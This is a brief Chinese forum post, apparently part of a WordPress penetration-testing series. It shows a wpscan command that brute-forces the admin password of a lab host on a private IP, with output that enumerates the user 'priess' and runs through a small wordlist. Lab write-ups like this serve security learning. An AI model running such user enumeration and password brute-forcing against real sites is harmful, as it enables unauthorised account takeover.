wordpress渗透测试(三)
暴力破解管理员密码命令:
wpscan --url http://192.168.3.234:8081 --wordlist ~/pass.txt结果如下
[+] Enumerating plugins from passive detection ...
[+] No plugins found
[+] Enumerating usernames ...
[+] Identified the following 1 user/s:
+----+--------+----------+
| Id | Login| Name |
+----+--------+----------+
| 1| priess | priess – |
+----+--------+----------+
[+] Starting the password brute forcer
[!] ERROR: We received an unknown response for login: priess and password: zhanglu
Brute Forcing 'priess' Time: 00:00:03 <===== > (19 / 20) 95.00%ETA: 00:00:00
+----+--------+----------+----------+
| Id | Login| Name | Password |
+----+--------+----------+----------+
| 1| priess | priess – | |
+----+--------+----------+----------+
页:
[1]